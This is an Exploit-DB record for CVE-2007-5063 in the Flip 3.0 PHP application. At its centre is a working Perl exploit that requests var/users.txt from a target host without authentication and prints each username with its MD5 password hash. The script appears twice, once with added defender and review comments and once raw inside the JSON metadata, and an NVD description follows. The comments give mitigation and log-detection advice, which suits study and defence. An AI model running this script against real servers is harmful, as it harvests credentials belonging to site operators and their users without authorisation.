ID EDB-ID:4436
Type exploitdb
Reporter undefined1_
Modified 2007-09-20T00:00:00
Description
Flip <= 3.0 Remote Password Hash Disclosure Exploit. CVE-2007-5063. Webapps exploit for php platform
#!/usr/bin/perl
use strict;
use IO::Socket;
# Overview: this script sends one unauthenticated HTTP GET for
# <path>var/users.txt on the host given on the command line and prints, for
# every line of the response body, the first 32 characters (labelled
# "md5 hash") and the text between the first two "][" markers (labelled
# "username").
#
# Defender notes (CVE-2007-5063; the advisory text on this page says the file
# is stored under the web root with insufficient access control):
#   - Mitigation: deny web access to the application's var/ directory or move
#     it outside the document root, then treat every hash stored in that file
#     as disclosed and rotate the affected passwords.
#   - Detection: review access logs for GET requests ending in var/users.txt
#     that were not answered with 404.

# Script metadata; none of these four values is read again in this file.
my $app    = "Flip <= 3.0";
my $type   = "Passwords Hash Disclosure";
my $author = "undefined1_";
my $vendor = "http://sourceforge.net/projects/flipsource";

banner();

# Both positional arguments are required; usage() prints help and exits.
my $server = shift || usage();
my $port   = shift || usage();

# Drop the scheme prefix.
# NOTE(review): the pattern is unanchored, so seven characters are removed
# from the front whenever "http://" occurs anywhere in the argument.
$server = substr($server, 7) if $server =~ m{http://};

# Split "host/some/dir" into host and directory; the directory always ends
# up with a trailing slash so the file name can be appended directly.
my $path     = "/";
my $slash_at = index($server, "/");
if ($slash_at != -1) {
    $path   = substr($server, $slash_at);
    $server = substr($server, 0, $slash_at);
    $path  .= "/" unless substr($path, -1) eq "/";
}

my $data = get($server, $port, $path."var/users.txt", "");

# The literal text "404 Not Found" anywhere in the response counts as failure.
fail() if $data =~ /404 Not Found/;

# The body starts after the first blank line (CRLF CRLF) of the response.
my $body_at = index($data, "\r\n\r\n");
fail() if $body_at < 0;
$data = substr($data, $body_at + 4);

printf("%-20s %-32s\n", "username", "md5 hash");

# Consume the body one "\n"-terminated line at a time.
# NOTE(review): the "][" searches run over all remaining data, not only the
# current line, so a line without both markers can pick up text from a later
# line.
my $eol;
while (($eol = index($data, "\n")) >= 0) {
    my $hash        = substr($data, 0, 32);
    my $first_mark  = index($data, "][");
    my $second_mark = index($data, "][", $first_mark + 2);

    my $user = ($first_mark >= 0 && $second_mark >= 0)
        ? substr($data, $first_mark + 2, $second_mark - ($first_mark + 2))
        : "";

    printf("%-20s %-32s\n", $user, $hash);
    $data = substr($data, $eol + 1);
}
###################
sub get(\$,\$,\$,\$) {
    # Build an HTTP/1.1 GET request for $page and pass it to sendpacket().
    #
    # Positional arguments: host name, TCP port, request path, cookie string
    # (an empty cookie string means no Cookie header is sent).
    # Returns whatever sendpacket() returns.
    #
    # NOTE(review): the only call to get() visible in this file is compiled
    # before this definition, so Perl does not apply the prototype to it; the
    # expression and literal arguments passed there would not satisfy "\$".
    my ($server, $port, $page, $cookies) = @_;

    # The port is spelled out in the Host header only when it is not 80.
    my $host_line = ($port != 80)
        ? "Host: $server:$port\r\n"
        : "Host: $server\r\n";

    # These header values are constants, so every request sent through this
    # sub carries the same User-Agent and Accept-Language. Together with the
    # requested path, that gives a stable signature for access-log review.
    my @request = (
        "GET $page HTTP/1.1\r\n",
        $host_line,
        "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.0.2) Gecko/20060308 Firefox/1.5.0.2\r\n",
        "Connection: close\r\n",
        "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\r\n",
        "Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3\r\n",
        "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n",
    );

    push @request, "Cookie: ".$cookies."\r\n" if length($cookies);

    # An empty line terminates the header section.
    push @request, "\r\n";

    return sendpacket($server, $port, join('', @request));
}
sub sendpacket(\$,\$,\$) {
    # Open a TCP connection to $server:$port, write $query to it, and return
    # everything the peer sends back until end of stream.
    #
    # Positional arguments: host name, TCP port, raw request text.
    # Dies with a "[-] Could not connect ..." message if the socket cannot
    # be created.
    #
    # NOTE(review): no Timeout is passed to IO::Socket::INET->new and the
    # read below has no limit, so the caller waits until the peer closes the
    # connection.
    my ($server, $port, $query) = @_;

    my $sock = IO::Socket::INET->new(
        PeerAddr => $server,
        PeerPort => $port,
        Proto    => "tcp",
    ) or die "[-] Could not connect to $server:$port $!\n";

    print $sock $query;

    # Reading the handle in list context collects every line up to EOF.
    my $data = join('', <$sock>);

    close($sock);
    return $data;
}
###################
sub fail() {
    # Report that the request did not yield usable data, then end the
    # program. exit with no argument uses status 0, so the failure is not
    # visible in the exit code.
    print "[-] exploit failed\n";
    exit 0;
}
sub banner() {
    # Print the two-line program banner followed by two blank lines.
    print ":: Flip <= 3.0 password hash disclosure exploit\n",
          ":: by undefined1_ @ www.undef1.com\n\n\n";
}
sub usage() {
    # Print the command-line synopsis and an example, then end the program
    # (exit status 0). Called when a required argument is missing.
    print "usage : ./flip_pass.pl <target> <port>\n",
          "example: ./flip_pass.pl www.abcd.com/flip/ 80\n";
    exit 0;
}
# milw0rm.com [2007-09-20]
{"id": "EDB-ID:4436", "hash": "1a923ff094dee3c93572def6cef96281", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Flip <= 3.0 - Remote Password Hash Disclosure Exploit", "description": "Flip <= 3.0 Remote Password Hash Disclosure Exploit. CVE-2007-5063. Webapps exploit for php platform", "published": "2007-09-20T00:00:00", "modified": "2007-09-20T00:00:00", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "href": "https://www.exploit-db.com/exploits/4436/", "reporter": "undefined1_", "references": [], "cvelist": ["CVE-2007-5063"], "lastseen": "2016-01-31T20:55:08", "history": [], "viewCount": 1, "enchantments": {"score": {"value": 5.7, "vector": "NONE", "modified": "2016-01-31T20:55:08"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2007-5063"]}], "modified": "2016-01-31T20:55:08"}, "vulnersScore": 5.7}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/4436/", "sourceData": "#!/usr/bin/perl\n\nuse strict; \nuse IO::Socket;\n\nmy $app = \"Flip <= 3.0\";\nmy $type = \"Passwords Hash Disclosure\";\nmy $author = \"undefined1_\";\nmy $vendor = \"http://sourceforge.net/projects/flipsource\";\n\nbanner();\nmy $server = shift || usage();\nmy $port = shift || usage();\n\nif($server =~ /http:\\/\\//)\n{\n\t$server = substr($server,7);\n}\n\nmy $path = \"/\";\nif(index($server, \"/\") != -1)\n{\n\t$path = substr($server, index($server, \"/\"));\n\t$server = substr($server, 0, index($server, \"/\"));\n\tif(substr($path, length($path)-1) ne \"/\") {\n\t\t$path .= \"/\";\n\t}\n}\n\nmy $data = get($server, $port, $path.\"var/users.txt\", \"\");\nfail() unless $data !~ /404 Not Found/;\nmy $index1 = index($data, \"\\r\\n\\r\\n\");\nfail() unless $index1 >= 0;\n\n$data = substr($data, $index1+4);\n$index1 = 0;\nprintf (\"%-20s %-32s\\n\", \"username\", \"md5 hash\");\nwhile(($index1 = index($data, \"\\n\")) >= 0)\n{\t\n\tmy $hash = substr($data, 0, 32);\n\tmy $index2 = index($data, 
\"][\");\n\tmy $index3 = index($data, \"][\", $index2+2);\n\tmy $user = \"\";\n\tif($index2 >= 0 && $index3 >= 0)\n\t{\n\t\t$user = substr($data, $index2+2, $index3-($index2+2));\n\t}\n\tprintf (\"%-20s %-32s\\n\", $user, $hash);\n\t$data = substr($data, $index1+1);\n}\n\n###################\n\nsub get(\\$,\\$,\\$,\\$) {\n\tmy $server = shift;\n\tmy $port = shift;\n\tmy $page = shift;\n\tmy $cookies = shift;\n\tmy $query = \"GET $page HTTP/1.1\\r\\n\";\n\tif($port != 80)\n\t{\n\t\t$query .= \"Host: $server:$port\\r\\n\";\n\t}\n\telse\n\t{\n\t\t$query .= \"Host: $server\\r\\n\";\n\t}\n\n\t$query .= \"User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.0.2) Gecko/20060308 Firefox/1.5.0.2\\r\\n\";\n\t$query .= \"Connection: close\\r\\n\";\n\t$query .= \"Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\\r\\n\";\n\t$query .= \"Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3\\r\\n\";\n\t$query .= \"Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\\r\\n\";\t\n\t\n\tif(length($cookies))\n\t{\n\t\t$query .= \"Cookie: \".$cookies.\"\\r\\n\";\n\t}\t\t\t\n\n\t$query .= \"\\r\\n\";\n\treturn sendpacket($server, $port, $query);\n}\n\n\n\n\n\nsub sendpacket(\\$,\\$,\\$) {\n\tmy $server = shift;\n\tmy $port = shift;\n\tmy $query = shift;\n\tmy $sock = IO::Socket::INET->new(Proto => \"tcp\", \n\t\t\t\tPeerAddr => $server, PeerPort => $port) \n\t\t\t\tor die \"[-] Could not connect to $server:$port $!\\n\";\n\tprint $sock $query;\n\tmy $data = \"\";\n\tmy $answer;\n\twhile($answer = <$sock>)\n\t{\n\t\t$data .= $answer;\n\t}\n\n\tclose($sock);\n\treturn $data;\n}\n\n\n\n###################\n\n\n\nsub fail() {\n\tprint \"[-] exploit failed\\n\";\n\texit;\n}\n\n\n\nsub banner() {\n\tprint \":: Flip <= 3.0 password hash disclosure exploit\\n\";\n\tprint \":: by undefined1_ @ www.undef1.com\\n\\n\\n\";\n}\n\n\n\nsub usage() {\n\tprint \"usage : ./flip_pass.pl <target> <port>\\n\";\n\tprint \"example: ./flip_pass.pl 
www.abcd.com/flip/ 80\\n\";\n\texit;\n}\n\n# milw0rm.com [2007-09-20]\n", "osvdbidlist": ["41903"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}
{"cve": [{"lastseen": "2019-05-29T18:09:01", "bulletinFamily": "NVD", "description": "Adam Scheinberg Flip 3.0 and earlier stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a file containing login credentials via a direct request for var/users.txt.", "modified": "2017-09-29T01:29:00", "id": "CVE-2007-5063", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-5063", "published": "2007-09-24T22:17:00", "title": "CVE-2007-5063", "type": "cve", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}]}